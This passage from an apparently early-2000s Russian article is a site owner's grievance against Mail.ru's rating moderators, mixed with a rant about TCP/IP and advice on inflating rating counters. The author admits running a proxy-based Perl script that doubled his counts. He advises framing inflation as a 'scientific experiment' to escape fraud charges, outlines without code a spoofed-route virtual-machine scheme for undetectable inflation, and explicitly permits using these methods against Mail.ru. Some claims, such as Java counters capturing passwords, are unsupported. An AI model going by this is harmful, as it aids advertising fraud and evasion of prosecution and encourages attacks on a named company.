&lt;br /&gt;ресурса (что мной неоднократно фиксировалось). Как Rambler.ru и &lt;br /&gt;обещали, что они &amp;quot;покрывают&amp;quot; порядка 65% RuNet-а, так и оказалось на &lt;br /&gt;самом деле. Я никогда не верю саморекламе вроде &amp;quot;Пресса о нас&amp;quot; или &lt;br /&gt;&amp;quot;А вот мы какие хорошие&amp;quot;, но тут я должен отдать должное - &lt;br /&gt;Rambler.ru можно верить. &lt;br /&gt;Поскольку ресурс работал в отладочном режиме, то в конфигурации &lt;br /&gt;Apache стояло MaxRequеstsPerChild=1. Из-за этого ограничения в &lt;br /&gt;кривой посещаемости появился горизонтальный &amp;quot;стол&amp;quot;. До 5-го мая я &lt;br /&gt;занимался исследованием соответствия пропускной способности канала и &lt;br /&gt;производительности сервера с одновременной правкой кода Проекта. &lt;br /&gt;Когда же я убедился, что все нормально, то сделал &lt;br /&gt;MaxRequеstsPerChild=0. Так появился второй скачок. В скором времени &lt;br /&gt;я планирую выложить на сайте окончательную версию проекта, и это &lt;br /&gt;будет третий скачок. &lt;br /&gt;Все изложенное мной можно подтвердить, анализируя log-файлы ресурса, &lt;br /&gt;которые я готов предоставить. Культурный человек, знакомый с теорией &lt;br /&gt;и имеющий опыт обработки результатов экспериментов, если бы не смог &lt;br /&gt;сам объяснить поведение кривой посещаемости, попросил бы объяснений &lt;br /&gt;у автора, и только потом, взвесив все &amp;quot;pro&amp;quot; и &amp;quot;contra&amp;quot; и имея на &lt;br /&gt;руках неопровержимые доказательства, обвинял бы в мошенничестве. Так &lt;br /&gt;не было сделано и теперь я делаю вывод, что модераторы рейтингов &lt;br /&gt;Mail.ru не обладает достаточной этической, правовой, научной и &lt;br /&gt;технической культурой, следовательно - невежи и невежды. Становится &lt;br /&gt;объяснимой попытка вымогательства, ибо, чем выше культурный уровень &lt;br /&gt;человека, тем сложнее ему покуситься на преступление, и наоборот, &lt;br /&gt;чем ниже - тем проще. По этой причине в приличном обществе невежам и &lt;br /&gt;невеждам обычно указывают на дверь. &lt;br /&gt;DURA LEX, SED LEX&lt;br /&gt;Я категорически запрещаю использовать изложенные в статье &lt;br /&gt;недостатки законодательства, факты, идеи и методы, как для &lt;br /&gt;совершения преступных деяний против кого-либо, так и в &lt;br /&gt;конкурентной борьбе. &lt;/p&gt;
						&lt;p&gt;Запрет не распространяется на действия, направленные против &lt;br /&gt;Mail.ru, до тех пор, пока Mail.ru не принесут публично извинение &lt;br /&gt;за нанесенное оскорбление и не будет восстановлен status quo &lt;br /&gt;счетчика. &lt;br /&gt;Предвосхищая возможные обвинения, я заявляю, что не пользовался и не &lt;br /&gt;пользуюсь &amp;quot;накруткой&amp;quot; счетчиков, не нарушаю Закон и стараюсь всегда &lt;br /&gt;следовать нормам этики. И этого же ожидаю от других. И всегда &lt;br /&gt;считаю, что каждый человек достоин уважения до тех пор, пока &lt;br /&gt;неопровержимо не доказано обратное. И как культурному человеку мне &lt;br /&gt;трудно преодолеть моральные барьеры и преднамеренно ущемить кого-то &lt;br /&gt;в правах или совершить преступление. Мне проще найти решение сложной &lt;br /&gt;задачи, ибо уровень моего интеллекта позволяет это делать. Это не &lt;br /&gt;самореклама. Хорошо знающие меня люди подтвердят мои слова. &lt;br /&gt;Чтобы не сталкиваться с неожиданностями, я предварительно рассмотрел &lt;br /&gt;практически все аспекты проблемы и наметил пути реализации &lt;br /&gt;поставленной задачи. Не скрою, &amp;quot;накрутку&amp;quot; я рассматривал как &lt;br /&gt;временно допустимое средство, которое могло помочь ресурсу быстрее &lt;br /&gt;подняться в рейтинге до уровня &amp;quot;самораскрутки&amp;quot; (верхние строки &lt;br /&gt;рейтинга), когда &amp;quot;накрутка&amp;quot; уже будет не нужна. Но, чтобы &lt;br /&gt;пользоваться &amp;quot;накруткой&amp;quot;, необходимо было выяснить юридические &lt;br /&gt;последствия от ее применения, а также кто может &amp;quot;поймать за руку&amp;quot; и &lt;br /&gt;как надо &amp;quot;накручивать&amp;quot; ресурс и не быть пойманным. &lt;br /&gt;Размышляя над смыслом &amp;quot;накрутки&amp;quot;, я пришел к формулировке, которую &lt;br /&gt;поместил в начало статьи. Поскольку в Уголовном Кодексе отсутствует &lt;br /&gt;специальная статья, посвященная &amp;quot;накрутке&amp;quot;, то ее следует &lt;br /&gt;рассматривать как обычное мошенничество. Поэтому, если во время &lt;br /&gt;&amp;quot;накрутки&amp;quot; счетчика ресурса рекламодателю не наносится материальный &lt;br /&gt;ущерб, то отсутствует законченный состав преступления в виде &lt;br /&gt;мошенничества. Если ущерб отсутствует, то можно смело утверждать, &lt;br /&gt;что проводится научный эксперимент, результаты которого возможно &lt;br /&gt;лягут в основу статьи (диссертации). Цель эксперимента может быть &lt;br /&gt;любой, от выяснения порога &amp;quot;самораскрутки&amp;quot;, до влияния Internet-а на &lt;br /&gt;урожайность кукурузы. Лишь бы заявляемая цель выглядела &lt;br /&gt;правдоподобно. &lt;br /&gt;Об этике говорить не приходится, и так все ясно. Радует уже то, что &lt;br /&gt;хотя бы удается избежать уголовного преследования. Российский &lt;br /&gt;законодатель заранее побеспокоился еще и о том, чтобы log-файлы, не &lt;br /&gt;говоря о результатах их обработки, нельзя было рассматривать в &lt;br /&gt;качестве доказательств вины (но не невиновности из-за действия &lt;br /&gt;принципа презумпции невиновности), благодаря логически неверным и &lt;br /&gt;действующим в настоящее время юридическим определениям понятия &lt;br /&gt;&amp;quot;документ&amp;quot;. &lt;br /&gt;В 1993 году меня попросили написать рецензию на проект закона &amp;quot;Об &lt;br /&gt;информации, информатизации и защите информации&amp;quot;. Для кардинального &lt;br /&gt;улучшения смысла Закона я предложил сделать всего две вещи, а &lt;br /&gt;именно: в начале текста закона дать логически точные и юридически &lt;br /&gt;правильные определения понятий &amp;quot;документ&amp;quot;, &amp;quot;документированная &lt;br /&gt;информация&amp;quot;, &amp;quot;стоимость информации&amp;quot;, &amp;quot;несанкционированный доступ&amp;quot; и &lt;br /&gt;др., и изъять из текста государственную поддержку информатизации &lt;br /&gt;из-за возможных злоупотреблений. В 1993 году я мог только &lt;br /&gt;предполагать, а теперь мы все знаем, сколько было пролито крови и &lt;br /&gt;какие финансовые потери понесла Россия из-за необоснованных &lt;br /&gt;таможенных льгот благотворительным организациям и фондам. Сравнение &lt;br /&gt;текстов проекта, рецензии и самого закона дает мне основание &lt;br /&gt;полагать, что мои предложения были учтены при подготовке &lt;br /&gt;окончательного варианта. Но во что превратились определения!!! &lt;br /&gt;Думаю, что комментарии будут излишни, если сравнить текст закона и &lt;br /&gt;данное мной в рецензии возможное определение: документ - носитель &lt;br /&gt;информации (объект материального мира), путем изменения физических, &lt;br /&gt;химических, механических или иных материальных свойств которого, &lt;br /&gt;закодирована информация методом кодирования, позволяющим дать &lt;br /&gt;однозначный ответ на вопрос: изменялась или нет информация на этом &lt;br /&gt;носителе в течении заранее обусловленного времени. Много позже, в &lt;br /&gt;1999 году в статье &amp;quot;Возможен неблагоприятный диагноз&amp;quot; я дал &lt;br /&gt;обоснование и привел не претендующее на абсолютную точность, но &lt;br /&gt;интуитивно правильное объективное определение понятия &amp;quot;информация&amp;quot;, &lt;br /&gt;отличное от ныне действующего субъективного (информация - это &lt;br /&gt;сведения...). &lt;br /&gt;Итак, если Вы по собственной воле разместили ссылку на свой ресурс в &lt;br /&gt;публичном списке участников рейтинга, и если эту ссылку помимо Вашей &lt;br /&gt;воли и не по решению Суда персонал рейтинговой системы удалил из &lt;br /&gt;этого списка, стоит сразу же требовать принесения Вам публичных &lt;br /&gt;извинений и восстановления ссылки в списке вплоть до подачи иска в &lt;br /&gt;Суд. Никакие внутренние правила (регламенты) рейтинговых систем не &lt;br /&gt;могут оправдать публично уничижающее Вас самоуправство (нарушение &lt;br /&gt;воли) и, тем более, публичное распространение порочащих Вас &lt;br /&gt;измышлений (обвинение в мошенничестве без решения Суда). И не стоит &lt;br /&gt;соглашаться с ничтожностью нанесенного Вам морального вреда, &lt;br /&gt;поскольку сам по себе сделанный в лицо плевок ничтожен (достаточно &lt;br /&gt;просто вытереться), но моральный вред от содеянного публично &lt;br /&gt;несоизмеримо огромен (вплоть до инфаркта или суицида). И обиходный &lt;br /&gt;смысл понятия &amp;quot;накрутки&amp;quot; тождественен обиходному понятию &lt;br /&gt;мошенничества. &lt;br /&gt;Однако вернемся к &amp;quot;накрутке&amp;quot;. Остался нерешенным вопрос о том, какая &lt;br /&gt;из рейтинговых систем реально может &amp;quot;поймать за руку&amp;quot;. В мае 2001 &lt;br /&gt;года я написал perl-скрипт, который имитируя работу броузера MS &lt;br /&gt;Internet Explorer читал указанные страницы и все ссылки первого &lt;br /&gt;уровня через публичные proxy, список которых регулярно публикуется &lt;br /&gt;Yahoo.com. Сразу оговорюсь, что этот скрипт уже уничтожен и это была &lt;br /&gt;разовая акция, которая легко отслеживается, и целью которой была не &lt;br /&gt;&amp;quot;накрутка&amp;quot;, а выяснение качества работы различных рейтинговых &lt;br /&gt;систем. В результате было выяснено, что Rambler.ru и SpyLog.ru &lt;br /&gt;&amp;quot;молча&amp;quot; отбрасывают дискредитированные адреса &amp;quot;на лету&amp;quot;, в то время &lt;br /&gt;как Mail.ru воспринимает дискредитированные адреса как &amp;quot;честные&amp;quot;. &lt;br /&gt;Посещаемость ресурса по статистике Mail.ru выросла в тот день в два &lt;br /&gt;раза. Мне очень понравился профессионально грамотный подхода &lt;br /&gt;Rambler.ru и SpyLog.ru к дискредитированным адресам и тогда же я &lt;br /&gt;впервые столкнулся с непрофессионализмом персонала Mail.ru. &lt;br /&gt;Теперь стоит сказать несколько слов о java-счетчике. Сам по себе код &lt;br /&gt;java-счетчика дает прибавку к трафику размером 1-2 Кбайт для каждой &lt;br /&gt;страницы. При показе сайтом порядка 10 тысяч страниц в сутки общая &lt;br /&gt;прибавка составляет 10-20 Мбайт. В месяц это составит 300-600 Мбайт. &lt;br /&gt;За это приходится платить порядка 15-30 долларов США. И за это же &lt;br /&gt;приходится платить пользователям. А эта прибавка составляет порядка &lt;br /&gt;10 процентов от всего трафика пользователя. Итак, применение &lt;br /&gt;Java-счетчиков приводит к увеличению финансовых затрат всех &lt;br /&gt;участников Internet-а минимум на 10 процентов. А раз мы платим &lt;br /&gt;деньги, то нам надо знать, за что же мы их на самом деле платим. &lt;br /&gt;Java-счетчик передает такую информацию о компьютере пользователя &lt;br /&gt;третьему лицу (модератору рейтинга), которую невозможно получить в &lt;br /&gt;рамках стандарта HTTP. По этой информации модератор рейтинга может &lt;br /&gt;узнать, откуда был осуществлен переход на страницу, какой сервиспак &lt;br /&gt;установлен на компьютере, пароли и многое другое. Так нарушается &lt;br /&gt;конфиденциальность сведений о лице и это может быть расценено, либо &lt;br /&gt;как перлюстрация корреспонденции без решения Суда, либо как &lt;br /&gt;получение несанкционированного доступа к компьютеру пользователя. &lt;br /&gt;Т.е., самоуправство, граничащее с уголовно наказемыми деяниями, &lt;br /&gt;нарушающими права людей. Получается, что все мы платим деньги за то, &lt;br /&gt;что нарушаются наши права. &lt;br /&gt;И в качестве одного из обоснований правомерности применения &lt;br /&gt;java-счетчика приводится запрет в регламенте на посещение &lt;br /&gt;участвующего в рейтинге ресурса со страниц порно-сайтов. Если Вы, &lt;br /&gt;находясь в туалете или в публичном доме, нашли информацию о давно &lt;br /&gt;разыскиваемом Вами товаре и месте его продажи, пришли в этот магазин &lt;br /&gt;и купили товар, то это Ваше личное дело и никто не в праве осуждать &lt;br /&gt;Вас за это. И это личное дело продавца, где ему размещать информацию &lt;br /&gt;о своем товаре, ибо это он сам выбирает наиболее эффективное с его &lt;br /&gt;точки зрения место размещения рекламы своего товара. И запрет на &lt;br /&gt;размещение рекламы (информации) следует рассматривать, как цензуру, &lt;br /&gt;которая запрещена Конституцией. А если некий &amp;quot;цензор на общественных &lt;br /&gt;началах&amp;quot; встанет перед магазином, размещающим свою рекламу в &lt;br /&gt;туалетах и публичных домах и начнет кричать, что все покупатели &lt;br /&gt;этого магазина засранцы и прелюбодеи, то его можно и в милицию &lt;br /&gt;определить суток на 15 за мелкое хулиганство. Или морду набить. Это &lt;br /&gt;кому из них как повезет. &lt;br /&gt;И сразу все становится понятно, надо только выстроить правильную &lt;br /&gt;аналогию в привычной нам сфере. Вот, в качестве примера, фраза из &lt;br /&gt;одного закона: &amp;quot;перед использованием средство защиты информации &lt;br /&gt;должно быть сертифицировано ФАПСИ&amp;quot;. Давайте заменим слова и обороты &lt;br /&gt;их синонимами: &amp;quot;средство защиты информации&amp;quot; на &amp;quot;сейф&amp;quot; (от &lt;br /&gt;английского safe - сохранять, защищать), &amp;quot;сертифицировано&amp;quot; на &lt;br /&gt;&amp;quot;исследовано&amp;quot; (сертификация - исследование образца на соответствие &lt;br /&gt;предъявляемым требованиям) и &amp;quot;ФАПСИ&amp;quot; на &amp;quot;постороннее лицо&amp;quot; (вряд ли &lt;br /&gt;ФАПСИ является подразделением Вашего предприятия). Получается &amp;quot;перед &lt;br /&gt;использованием сейф должен быть исследован посторонним лицом&amp;quot;. Не &lt;br /&gt;знаю как Вы, а лично я такому &amp;quot;сейфу&amp;quot; не доверю даже использованные &lt;br /&gt;презервативы. &lt;br /&gt;И последний вопрос, как технически организовать &amp;quot;накрутку&amp;quot; так, &lt;br /&gt;чтобы высоко профессиональные команды не смогли бы отличить работу &lt;br /&gt;виртуальных машин от реальных. Поиск в Internet-е компьютеров с ОС &lt;br /&gt;Windows, затем их &amp;quot;взлом&amp;quot; и внедрение в систему кода для &amp;quot;накрутки&amp;quot; &lt;br /&gt;счетчиков отметаю сразу, как явную уголовщину, которая подпадает под &lt;br /&gt;действие сразу всех &amp;quot;компьютерных&amp;quot; статей УК. А милиции стоит &lt;br /&gt;задуматься о поимке мошенников, которые пользуются такой &lt;br /&gt;&amp;quot;накруткой&amp;quot;, ибо этот вид мошенничества, по определению, входит в &lt;br /&gt;компетенцию подразделений по борьбе с преступлениями в сфере высоких &lt;br /&gt;технологий. &lt;br /&gt;Остается единственный вариант, учитывая особенности протокола &lt;br /&gt;TCP/IP, создать на некотором компьютере (лучше - на нескольких) &lt;br /&gt;систему виртуальных машин, максимально точно имитирующую в &lt;br /&gt;необходимом для &amp;quot;накрутки&amp;quot; объеме работу реальных машин с ОС Windows &lt;br /&gt;и различными броузерами из реального адресного пространства &lt;br /&gt;Internet. Это сродни использованию публичных proxy, (их немного в &lt;br /&gt;Internet-е и они прекрасно отслеживаются). Но, в отличии от proxy, &lt;br /&gt;виртуальные машины, учитывающие особенности протокола TCP/IP, крайне &lt;br /&gt;сложно выявлять и их можно сгенерировать на одном компьютере &lt;br /&gt;несколько миллионов. И никакие java-счетчики или IPv6 не помогут их &lt;br /&gt;отсеять. А если еще учесть особенности ныне действующего Российского &lt;br /&gt;законодательства, то работу с такими машинами можно организовать &lt;br /&gt;так, что предъявить обвинение в мошенничестве будет практически &lt;br /&gt;невозможно. Другие варианты &amp;quot;накрутки&amp;quot; либо не дают должного &lt;br /&gt;эффекта, либо легко выявляются и нейтрализуются. &lt;br /&gt;Дорога в Ад&lt;br /&gt;В правительстве США есть департамент DoD, который курирует научные &lt;br /&gt;разработки в военной области. В недрах DoD родился проект военных &lt;br /&gt;сетей передачи данных ARPA. Для применения в военной сфере &lt;br /&gt;разработка получилась на редкость удачной. Потом, ничтоже сумняшеся, &lt;br /&gt;эту разработку чуть-чуть подправили и применили в гражданской сфере &lt;br /&gt;под именем TCP/IP. Сделано это было из благих намерений: зачем &lt;br /&gt;тратить лишние деньги на разработку чего-то нового, когда вот оно &lt;br /&gt;готовое решение - бери и применяй. И применили. Правда, сплошной мед &lt;br /&gt;иногда отдавал привкусом дегтя, вроде червя Морриса-младшего, &lt;br /&gt;Мелиссы, атаки Митника или DNS-шторма. Но это все были первые &lt;br /&gt;звоночки, ибо авторы принятого решения не учли (или не знали), что &lt;br /&gt;дорога в Ад вымощена благими намерениями. &lt;br /&gt;Задачи, решаемые сетями передачи данных в условиях войны, &lt;br /&gt;кардинально отличаются от задач мирного времени. На войне, если &lt;br /&gt;подразделение (компьютер) будет срочно и скрытно передислоцировано в &lt;br /&gt;другое место, то после марша подразделение должно быть &lt;br /&gt;незамедлительно развернуто в боевой порядок и наладить &lt;br /&gt;взаимодействие с остальными силами. Для этого бывает достаточно &lt;br /&gt;связаться (модем и телефонная линия) с ближайшим подразделением &lt;br /&gt;фельдсвязи (провайдер) и указать старый или получить новый номер &lt;br /&gt;полевой почты (IP-адрес) войсковой части. Изменение пути доставки &lt;br /&gt;приказов к этому подразделению (информации) должно происходить &lt;br /&gt;просто и незаметно для всей остальной системы (Internet) военной &lt;br /&gt;связи. И всегда должны существовать резервные пути доставки приказов &lt;br /&gt;(каналы связи и модемные пулы других провайдеров). И не важно, по &lt;br /&gt;какому пути доставлен приказ, важно доставить его максимально быстро &lt;br /&gt;и важно, что приказу можно доверять, поскольку маршрут проходил по &lt;br /&gt;своей территории (сеть провайдера, Ru.Net, Internet) и почтальоны &lt;br /&gt;всегда были свои. Поэтому, как процедуры доставки (роутинг), так и &lt;br /&gt;сами приказы (IP-пакеты) имеют простою форму, достаточную для &lt;br /&gt;быстрой проверки достоверности по простым формальным признакам. А &lt;br /&gt;если будет уничтожен батальон (отключен компьютер), то ни полк (сеть &lt;br /&gt;провайдера), ни дивизия (Ru.Net), ни армия (Internet) из-за это не &lt;br /&gt;должны быть дезорганизованы. Ибо, в армии потеря части не должна &lt;br /&gt;приводить к потери целого. Иногда частью даже жертвуют во имя &lt;br /&gt;спасения целого. Ебинообразие - основная черта любой армии. И все ее &lt;br /&gt;части структурно просты, ибо для воссоздания структурно простой &lt;br /&gt;конструкции (масштабирование) нужны небольшие затраты. И увеличение &lt;br /&gt;численности армии происходит заполнением мобилизованными &lt;br /&gt;резервистами предварительно развернутых кадрированных частей, &lt;br /&gt;полностью укомплектованные вооружением и техникой. &lt;br /&gt;В мирной жизни все иначе. Нас много и все мы разные. И каждый из нас &lt;br /&gt;индивидуален. Цель мирной жизни - развитие общества, а это &lt;br /&gt;невозможно, если все члены общества будут одинаково простые. Надо &lt;br /&gt;чтобы все мы были по разному сложные. И это различие является &lt;br /&gt;основной ценностью общества. И все индивидуальности объединяет в &lt;br /&gt;единое целое статичная инфраструктура. А это и &lt;br /&gt;водо-газо-электро-снабжение, и канализация, и милиция, и почта, и &lt;br /&gt;школа, и детский сад, и дороги, и магазины, и дома и многое-многое &lt;br /&gt;другое. И существенные изменения инфраструктуры сродни революциям и &lt;br /&gt;очень болезненно воспринимается всеми, ибо рушатся устойчивые связи. &lt;br /&gt;И потеря одного члена общества сказывается на всех. И это &lt;br /&gt;невосполнимая потеря, ибо может привести к изменению пути развития &lt;br /&gt;всего общества. И на формирование каждого своего члена общество &lt;br /&gt;затрачивает большие ресурсы, ибо заранее невозможно сказать, кто &lt;br /&gt;привнесет больший вклад в развитие общества, а кто меньший. И &lt;br /&gt;невозможно сразу определить, кто является вором, а кто честным &lt;br /&gt;человеком, поэтому априори предполагается, что все люди - честные, &lt;br /&gt;но кошелек лучше держать всегда подальше. И в мирной жизни иногда &lt;br /&gt;случается, что почта приходит не тому адресату и это допустимо, ибо &lt;br /&gt;в мирной жизни мы не привыкли слишком доверять необычному. &lt;br /&gt;Армия лишь небольшая часть общества, существующая только для защиты &lt;br /&gt;общества и предназначена для ведения боевых действий. И не может &lt;br /&gt;заменить собой само общество. Иначе - война. И чем дольше армия не &lt;br /&gt;участвует в боевых действиях, тем сложнее структурно она становится, &lt;br /&gt;тем больше в ней накапливается различных проявлений мирной жизни. И &lt;br /&gt;этот процесс усложнения называется разложением армии. И армия &lt;br /&gt;борется с разложением. Единственный эффективный путь борьбы - война. &lt;br /&gt;Недаром США после 1945 года постоянно участвовали в региональных &lt;br /&gt;конфликтах (Корея, Куба, Вьетнам, Камбоджа, Ирак, Косово, &lt;br /&gt;Афганистан). Война все списывает и можно кого-то убить или послать &lt;br /&gt;на смерть и ничего за это не будет, особенно если есть широкие &lt;br /&gt;лампасы. И в армии начинают превалировать структурно простые, вроде &lt;br /&gt;хамоватых и невежественных &amp;quot;генерал-модераторов&amp;quot; от Mail.ru. &lt;br /&gt;Простота армии эффективна только тогда, когда есть четкая линия &lt;br /&gt;фронта, с одной стороны которой - соратники, а с другой - &lt;br /&gt;противники. И армия всегда проигрывает в борьбе с партизанами, когда &lt;br /&gt;нет четкой границы между соратниками и противниками. Будь то во &lt;br /&gt;время Великой Отечественной Войны, во Вьетнаме, в Афганистане, в &lt;br /&gt;Косово или в Чечне. И только создание сложной инфраструктуры мирной &lt;br /&gt;жизни делает возможным прекращение партизанской войны. Но это уже не &lt;br /&gt;война и не в этом состоит задача армии. И простота армии в сложной &lt;br /&gt;ситуации играет с ней злую шутку. В начале Чеченской кампании &lt;br /&gt;Российская армия пользовалась для связи между подразделениями &lt;br /&gt;широковещательными каналами радиосвязи. Во время артобстрелов &lt;br /&gt;чеченские боевики, маскируясь в каналах радиосвязи под подразделения &lt;br /&gt;Российской армии, корректировали огонь так, что обстрелу &lt;br /&gt;подвергались подразделения Российской армии. И армия сама себя &lt;br /&gt;уничтожала. &lt;br /&gt;Неисповедимы пути пакетов&lt;br /&gt;Я не буду рассматривать все возможные методы обмана в сети Internet. &lt;br /&gt;Я и так уже сказал и еще скажу достаточно, чтобы умный человек смог &lt;br /&gt;сам дальше развить мои мысли, а &amp;quot;безбашенным&amp;quot; все знать небезопасно &lt;br /&gt;прежде всего для самих себя. Я опишу лишь один единственный &lt;br /&gt;Чеченский вариант маскировки. Ибо, именно этот вариант наиболее &lt;br /&gt;пригоден для использования в &amp;quot;накрутке&amp;quot;, которую практически &lt;br /&gt;невозможно выявлять. И я не приведу ни одной строки кода, дабы меня &lt;br /&gt;не могли обвинить в написании вредоносных программ, и намеренно &lt;br /&gt;допущу некоторые умолчания и неточности, дабы меня не могли обвинить &lt;br /&gt;в подстрекательстве к мошенничеству. &lt;br /&gt;Рассмотрим процедуру роутинга, реализованную в протоколе TCP/IP. &lt;br /&gt;Предположим, что имеется некий компьютер (клиент), который пытается &lt;br /&gt;установить связь с другим компьютером (сервер). Клиент передает &lt;br /&gt;IP-пакет (датаграмму) ближайшему роутеру (хопу), который объявлен в &lt;br /&gt;таблицах роутинга клиента, как default. Дальше датаграмма передается &lt;br /&gt;от хопа к хопу до достижения конечной точки маршрута или исчерпания &lt;br /&gt;счетчика хопов пакета. Если по таблице роутинга хопа невозможно &lt;br /&gt;определить, какой ближайший хоп знает куда направить пакет дальше, &lt;br /&gt;то он направляется default router-у этого хопа. Заметим одну &lt;br /&gt;особенность такой процедуры роутинга: она справедлива для любых &lt;br /&gt;адресов источников и приемников датаграмм и любой хоп по умолчанию &lt;br /&gt;знает свойства только ближайших хопов. Internet - глобальная сеть и &lt;br /&gt;в ней постоянно что-то происходит. То компьютеры включаются, то &lt;br /&gt;выключаются, то отваливаются каналы, то появляются новые. В общем, &lt;br /&gt;сеть &amp;quot;живет&amp;quot; и поведение какой-то части сети не должно мешать &lt;br /&gt;доставке пакетов других ее частей. И если какой-то хоп вышел из &lt;br /&gt;строя, то его тут же готовы заменить несколько ближайших хопов, &lt;br /&gt;создав обходной маршрут движения датаграмм. Так достигается &lt;br /&gt;высочайшая надежность доставки пакетов, и, следовательно, всей сети &lt;br /&gt;как средства доставки информации от одного компьютера к другому. И &lt;br /&gt;именно это свойство используется для Чеченской маскировки при &lt;br /&gt;&amp;quot;накрутке&amp;quot; счетчиков. &lt;br /&gt;Мне могут возразить, что есть протокол TCP из стека протоколов IP и &lt;br /&gt;он устанавливает статичный маршрут доставки датаграмм, как от &lt;br /&gt;клиента к серверу, так и в обратном направлении. Да, это так, но с &lt;br /&gt;несколькими оговорками. Во первых, процедура поиска маршрута &lt;br /&gt;используется та же, что и для доставки простых датаграмм. Во вторых, &lt;br /&gt;адрес следующего хопа для доставки пакетов в рамках соединения &lt;br /&gt;хранится динамически, и только до тех пор, пока соединение не будет &lt;br /&gt;закрыто. В третьих, такой маршрут не попадает в таблицы &lt;br /&gt;маршрутизации и становится невидимым для других соединений. Иногда &lt;br /&gt;встречается неполная реализация процедуры маршрутизации соединений, &lt;br /&gt;когда маршруты временно размещаются в таблицах роутинга, тогда это &lt;br /&gt;свойство можно использовать для прослушивания трафика от &lt;br /&gt;интересующего компьютера. &lt;br /&gt;Статически прописывать маршруты для каждого хопа - задача физически &lt;br /&gt;нереализуемая, особенно для больших сетей. Для снижения затрат при &lt;br /&gt;прописывании маршрутов был придуман RIP. Но, при использовании RIP &lt;br /&gt;или его расширений (BGP, EGRP и др.) возрастает опасность &lt;br /&gt;блокирования работы сети на неопределенное время, когда объем &lt;br /&gt;служебного трафика начнет существенно превышать объем полезного. Вы &lt;br /&gt;можете провести поучительный эксперимент, если у Вас под руками &lt;br /&gt;имеется разнородная сеть с &amp;quot;излишне умными&amp;quot; маршрутизаторами &lt;br /&gt;(порядка сотни компьютеров, порядка десяти роутеров CISCO, часть &lt;br /&gt;которых соединена треугольником каналами связи с различной &lt;br /&gt;пропускной способностью). Однажды, настраивая компьютер с HPUX в &lt;br /&gt;одной организации с такой сетью, я не отключил на этой машине &lt;br /&gt;DHCP-сервер и в конце RC-файла вставил команду reboot. Не помню уже, &lt;br /&gt;но для чего-то мне это было нужно. И сеть встала. Скорость передачи &lt;br /&gt;ftp-данных в 100 мегабитном сегменте сети стала что-то порядка &lt;br /&gt;1.5-1.9 Кбайт/сек, хотя нормальная была 9-11 Мбайт/сек. Замерил &lt;br /&gt;объем служебного трафика - 99 процентов. При выключении HPUX или &lt;br /&gt;замене CISCO на простые HUB-ы работа сети восстанавливалась. &lt;br /&gt;Пусть в сети имеются три компьютера: A (атакующий), B (имитируемый), &lt;br /&gt;C (счетчик) и пусть в сети имеются два промежуточных хопа X1, X2. &lt;br /&gt;Задача: имитация соединения между компьютерами по маршруту &lt;br /&gt;B&amp;lt;=&amp;gt;X1&amp;lt;=&amp;gt;X2&amp;lt;=&amp;gt;C. Решение: поскольку маршруты движения пакетов в &lt;br /&gt;сетях TCP/IP заранее никак не регламентирован, создать для &lt;br /&gt;компьютера C иллюзию движения пакетов по маршруту &lt;br /&gt;B&amp;lt;=&amp;gt;X1&amp;lt;=&amp;gt;A&amp;lt;=&amp;gt;X2&amp;lt;=&amp;gt;C. Сначала надо убедиться, что компьютер B &lt;br /&gt;находится в сети. Затем, виртуальная машина на компьютере A посылает &lt;br /&gt;пакет установления соединения на компьютер C такого вида, словно он &lt;br /&gt;прошел по маршруту B&amp;lt;=&amp;gt;X1&amp;lt;=&amp;gt;A. Все остальные пакеты до закрытия &lt;br /&gt;соединения будут двигаться по установленному маршруту A&amp;lt;=&amp;gt;X2&amp;lt;=&amp;gt;C и &lt;br /&gt;должны иметь такие параметры, словно они предварительно прошли по &lt;br /&gt;маршруту B&amp;lt;=&amp;gt;X1&amp;lt;=&amp;gt;A. Попытка проследить маршрут движения пакетов с &lt;br /&gt;компьютера C до компьютера B даст маршрут B&amp;lt;=&amp;gt;X1&amp;lt;=&amp;gt;X2&amp;lt;=&amp;gt;C, поскольку &lt;br /&gt;это будет уже новое соединение. Необходимо добиться, чтобы &lt;br /&gt;виртуальная машина могла в необходимом для маскировки объеме &lt;br /&gt;имитировать ОС и броузер компьютера B. Так для компьютера C &lt;br /&gt;создается полная иллюзия работы с компьютером B и никакими &lt;br /&gt;средствами TCP/IP эту иллюзию нельзя развеять. Вот такой вот &lt;br /&gt;фокус-покус. &lt;br /&gt;&amp;quot;Здравствуйте, девочки...&amp;quot;&lt;br /&gt;Рейтинговым системам, в том виде, в каком они существуют в настоящее &lt;br /&gt;время, грозит полная дискредитация. И не моя в том вина, лишь &lt;br /&gt;пользуясь научным методом, я даю описание положения дел в этой &lt;br /&gt;сфере, и, основываясь на результатах анализа, делаю синтез &lt;br /&gt;возможного варианта развития событий. &lt;br /&gt;Удаление ресурса из рейтинга свидетельствует о низкой квалификации &lt;br /&gt;персонала, поскольку такой персонал либо не знает других методов &lt;br /&gt;борьбы с &amp;quot;накруткой&amp;quot;, либо ему проще ущемлять права других, чем &lt;br /&gt;работать своими мозгами. Это не добавляет доверия рейтинговым &lt;br /&gt;системам. И поскольку действия персонала могут быть обжалованы в &lt;br /&gt;Суде, то после двух-трех проигранных процессов (как и в случае с &lt;br /&gt;законом &amp;quot;О защите прав потребителей&amp;quot;) персоналы рейтинговых систем &lt;br /&gt;вообще прекратят удалять из списков участников рейтингов любые &lt;br /&gt;ресурсы. &lt;br /&gt;В результате, верхние строки рейтингов заполонят &amp;quot;накрученные&amp;quot; &lt;br /&gt;ресурсы. Хорошо, если как-то удастся изобличать в мошенничестве &lt;br /&gt;владельцев таких ресурсов. А если нет? Второе более вероятно, ибо &lt;br /&gt;любое сомнение всегда трактуется в пользу подозреваемого &lt;br /&gt;(обвиняемого). Следовательно, мошенники чаще всего будут оставаться &lt;br /&gt;безнаказанными, и будут все более активно пользоваться доверием к &lt;br /&gt;рейтинговым системам. Став невольными пособниками мошенников, &lt;br /&gt;рейтинговые системы только усугубят потерю доверия. &lt;br /&gt;Значительное снижение доверия приведет к снижению капитализации &lt;br /&gt;рейтинговых систем, поскольку в основе этого вида бизнеса лежит &lt;br /&gt;доверие к высокой квалификации и честности персонала. Как следствие, &lt;br /&gt;снизится доходность бизнеса. И начнется отток квалифицированного &lt;br /&gt;персонала. &lt;br /&gt;И круг замкнется. Значительное снижение доверия приведет к &lt;br /&gt;финансовым потерям, из-за чего возникнут сложности с наймом &lt;br /&gt;квалифицированного персонала, из-за чего еще больше снизится доверие &lt;br /&gt;бизнесу, из-за чего еще больше снизится доходность бизнеса, из-за &lt;br /&gt;чего еще сложнее станет наем квалифицированного персонала, и т.д. &lt;br /&gt;Это описание возможной схемы цепной реакции 